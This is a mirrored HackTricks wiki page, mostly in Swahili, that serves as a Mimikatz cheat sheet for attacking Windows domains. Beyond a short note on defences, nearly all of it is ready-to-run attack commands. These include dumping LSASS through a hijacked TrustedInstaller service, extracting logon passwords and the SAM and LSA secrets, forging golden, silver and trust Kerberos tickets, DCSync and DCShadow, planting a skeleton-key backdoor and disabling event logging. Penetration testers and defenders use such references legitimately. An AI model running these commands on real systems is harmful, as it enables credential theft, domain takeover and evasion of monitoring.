Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-12-02 01:19:45 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/windows-hardening/stealing-credentials/credentials-mimikatz.md

10 KiB
Raw Blame History

Mimikatz

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

This page is based on one from adsecurity.org. Check the original for further info!

LM na Maneno ya Kawaida katika kumbukumbu

Kuanzia Windows 8.1 na Windows Server 2012 R2 kuendelea, hatua kubwa zimechukuliwa kulinda dhidi ya wizi wa akidi:

  • LM hashes na nywila za maandiko hazihifadhiwi tena katika kumbukumbu ili kuboresha usalama. Mipangilio maalum ya rejista, HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "UseLogonCredential" inapaswa kuwekewa thamani ya DWORD ya 0 ili kuzima Uthibitishaji wa Digest, kuhakikisha kwamba nywila "za maandiko" hazihifadhiwi katika LSASS.

  • Ulinzi wa LSA umeanzishwa ili kulinda mchakato wa Mamlaka ya Usalama wa Mitaa (LSA) kutoka kwa usomaji wa kumbukumbu usioidhinishwa na sindano ya msimbo. Hii inafikiwa kwa kuashiria LSASS kama mchakato uliohifadhiwa. Kuanzisha Ulinzi wa LSA kunahusisha:

  1. Kubadilisha rejista katika HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa kwa kuweka RunAsPPL kuwa dword:00000001.
  2. Kutekeleza Kituo cha Sera ya Kundi (GPO) kinacholazimisha mabadiliko haya ya rejista katika vifaa vinavyosimamiwa.

Licha ya ulinzi huu, zana kama Mimikatz zinaweza kupita Ulinzi wa LSA kwa kutumia madereva maalum, ingawa vitendo kama hivyo vinaweza kurekodiwa katika kumbukumbu za matukio.

Kupambana na Kuondolewa kwa SeDebugPrivilege

Wasimamizi kwa kawaida wana SeDebugPrivilege, ambayo inawawezesha kufuatilia programu. Haki hii inaweza kupunguzwa ili kuzuia matukio yasiyoidhinishwa ya kumbukumbu, mbinu ya kawaida inayotumiwa na washambuliaji kutoa akidi kutoka kwa kumbukumbu. Hata hivyo, hata haki hii ikiondolewa, akaunti ya TrustedInstaller bado inaweza kufanya matukio ya kumbukumbu kwa kutumia usanidi maalum wa huduma:

sc config TrustedInstaller binPath= "C:\\Users\\Public\\procdump64.exe -accepteula -ma lsass.exe C:\\Users\\Public\\lsass.dmp"
sc start TrustedInstaller

Hii inaruhusu kutolewa kwa kumbukumbu ya lsass.exe kwenye faili, ambayo inaweza kuchambuliwa kwenye mfumo mwingine ili kutoa akidi:

# privilege::debug
# sekurlsa::minidump lsass.dmp
# sekurlsa::logonpasswords

Mimikatz Options

Event log tampering in Mimikatz involves two primary actions: clearing event logs and patching the Event service to prevent logging of new events. Below are the commands for performing these actions:

Clearing Event Logs

  • Command: Hii hatua inalenga kufuta kumbukumbu za matukio, na kufanya iwe vigumu kufuatilia shughuli mbaya.
  • Mimikatz haitoi amri moja kwa moja katika hati zake za kawaida za kufuta kumbukumbu za matukio moja kwa moja kupitia mstari wake wa amri. Hata hivyo, usimamizi wa kumbukumbu za matukio kwa kawaida unahusisha kutumia zana za mfumo au skripti nje ya Mimikatz kufuta kumbukumbu maalum (kwa mfano, kutumia PowerShell au Windows Event Viewer).

Experimental Feature: Patching the Event Service

  • Command: event::drop

  • Amri hii ya majaribio imeundwa kubadilisha tabia ya Huduma ya Kumbukumbu za Matukio, kwa ufanisi kuzuia kurekodi matukio mapya.

  • Mfano: mimikatz "privilege::debug" "event::drop" exit

  • Amri ya privilege::debug inahakikisha kwamba Mimikatz inafanya kazi kwa ruhusa zinazohitajika kubadilisha huduma za mfumo.

  • Amri ya event::drop kisha inarekebisha huduma ya Kumbukumbu za Matukio.

Kerberos Ticket Attacks

Golden Ticket Creation

Golden Ticket inaruhusu upatanishi wa ufikiaji wa kiwango cha kikoa. Amri muhimu na vigezo:

  • Command: kerberos::golden
  • Parameters:
  • /domain: Jina la kikoa.
  • /sid: Kitambulisho cha Usalama wa kikoa (SID).
  • /user: Jina la mtumiaji wa kuiga.
  • /krbtgt: Hash ya NTLM ya akaunti ya huduma ya KDC ya kikoa.
  • /ptt: Inachoma tiketi moja kwa moja kwenye kumbukumbu.
  • /ticket: Huhifadhi tiketi kwa matumizi ya baadaye.

Mfano:

mimikatz "kerberos::golden /user:admin /domain:example.com /sid:S-1-5-21-123456789-123456789-123456789 /krbtgt:ntlmhash /ptt" exit

Uundaji wa Tiketi ya Silver

Tiketi za Silver zinatoa ufikiaji kwa huduma maalum. Amri kuu na vigezo:

  • Amri: Inafanana na Tiketi ya Dhahabu lakini inalenga huduma maalum.
  • Vigezo:
  • /service: Huduma ya kulenga (mfano, cifs, http).
  • Vigezo vingine vinafana na Tiketi ya Dhahabu.

Mfano:

mimikatz "kerberos::golden /user:user /domain:example.com /sid:S-1-5-21-123456789-123456789-123456789 /target:service.example.com /service:cifs /rc4:ntlmhash /ptt" exit

Uundaji wa Tiketi ya Kuamini

Tiketi za Kuamini zinatumika kwa kupata rasilimali kati ya maeneo kwa kutumia uhusiano wa kuamini. Amri kuu na vigezo:

  • Amri: Inafanana na Tiketi ya Dhahabu lakini kwa uhusiano wa kuamini.
  • Vigezo:
  • /target: FQDN ya eneo lengwa.
  • /rc4: Hash ya NTLM kwa akaunti ya kuamini.

Mfano:

mimikatz "kerberos::golden /domain:child.example.com /sid:S-1-5-21-123456789-123456789-123456789 /sids:S-1-5-21-987654321-987654321-987654321-519 /rc4:ntlmhash /user:admin /service:krbtgt /target:parent.example.com /ptt" exit

Amri za Nyongeza za Kerberos

  • Orodha ya Tiketi:

  • Amri: kerberos::list

  • Inoorodhesha tiketi zote za Kerberos kwa kikao cha mtumiaji wa sasa.

  • Pita kwenye Kache:

  • Amri: kerberos::ptc

  • Inachanganya tiketi za Kerberos kutoka kwenye faili za kache.

  • Mfano: mimikatz "kerberos::ptc /ticket:ticket.kirbi" exit

  • Pita Tiketi:

  • Amri: kerberos::ptt

  • Inaruhusu kutumia tiketi ya Kerberos katika kikao kingine.

  • Mfano: mimikatz "kerberos::ptt /ticket:ticket.kirbi" exit

  • Futa Tiketi:

  • Amri: kerberos::purge

  • Inafuta tiketi zote za Kerberos kutoka kwenye kikao.

  • Inafaida kabla ya kutumia amri za kubadilisha tiketi ili kuepuka migongano.

Uingiliaji wa Active Directory

  • DCShadow: Fanya mashine kuwa DC kwa muda kwa ajili ya kubadilisha vitu vya AD.

  • mimikatz "lsadump::dcshadow /object:targetObject /attribute:attributeName /value:newValue" exit

  • DCSync: Fanya kama DC ili kuomba data za nywila.

  • mimikatz "lsadump::dcsync /user:targetUser /domain:targetDomain" exit

Upatikanaji wa Akikazi

  • LSADUMP::LSA: Toa akiba kutoka LSA.

  • mimikatz "lsadump::lsa /inject" exit

  • LSADUMP::NetSync: Fanya kama DC kwa kutumia data za nywila za akaunti ya kompyuta.

  • Hakuna amri maalum iliyotolewa kwa NetSync katika muktadha wa asili.

  • LSADUMP::SAM: Fikia hifadhidata ya SAM ya ndani.

  • mimikatz "lsadump::sam" exit

  • LSADUMP::Secrets: Fanya ufichuzi wa siri zilizohifadhiwa kwenye rejista.

  • mimikatz "lsadump::secrets" exit

  • LSADUMP::SetNTLM: Weka hash mpya ya NTLM kwa mtumiaji.

  • mimikatz "lsadump::setntlm /user:targetUser /ntlm:newNtlmHash" exit

  • LSADUMP::Trust: Pata taarifa za uthibitisho wa uaminifu.

  • mimikatz "lsadump::trust" exit

Mambo Mbalimbali

  • MISC::Skeleton: Ingiza nyuma ya mlango kwenye LSASS kwenye DC.
  • mimikatz "privilege::debug" "misc::skeleton" exit

Kuinua Haki

  • PRIVILEGE::Backup: Pata haki za nakala.

  • mimikatz "privilege::backup" exit

  • PRIVILEGE::Debug: Pata haki za debug.

  • mimikatz "privilege::debug" exit

Utoaji wa Akikazi

  • SEKURLSA::LogonPasswords: Onyesha akiba za watumiaji walioingia.

  • mimikatz "sekurlsa::logonpasswords" exit

  • SEKURLSA::Tickets: Toa tiketi za Kerberos kutoka kwenye kumbukumbu.

  • mimikatz "sekurlsa::tickets /export" exit

Ubadilishaji wa Sid na Token

  • SID::add/modify: Badilisha SID na SIDHistory.

  • Ongeza: mimikatz "sid::add /user:targetUser /sid:newSid" exit

  • Badilisha: Hakuna amri maalum ya kubadilisha katika muktadha wa asili.

  • TOKEN::Elevate: Fanya kama token.

  • mimikatz "token::elevate /domainadmin" exit

Huduma za Terminal

  • TS::MultiRDP: Ruhusu vikao vingi vya RDP.

  • mimikatz "ts::multirdp" exit

  • TS::Sessions: Orodhesha vikao vya TS/RDP.

  • Hakuna amri maalum iliyotolewa kwa TS::Sessions katika muktadha wa asili.

Vault

  • Toa nywila kutoka Windows Vault.
  • mimikatz "vault::cred /patch" exit

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}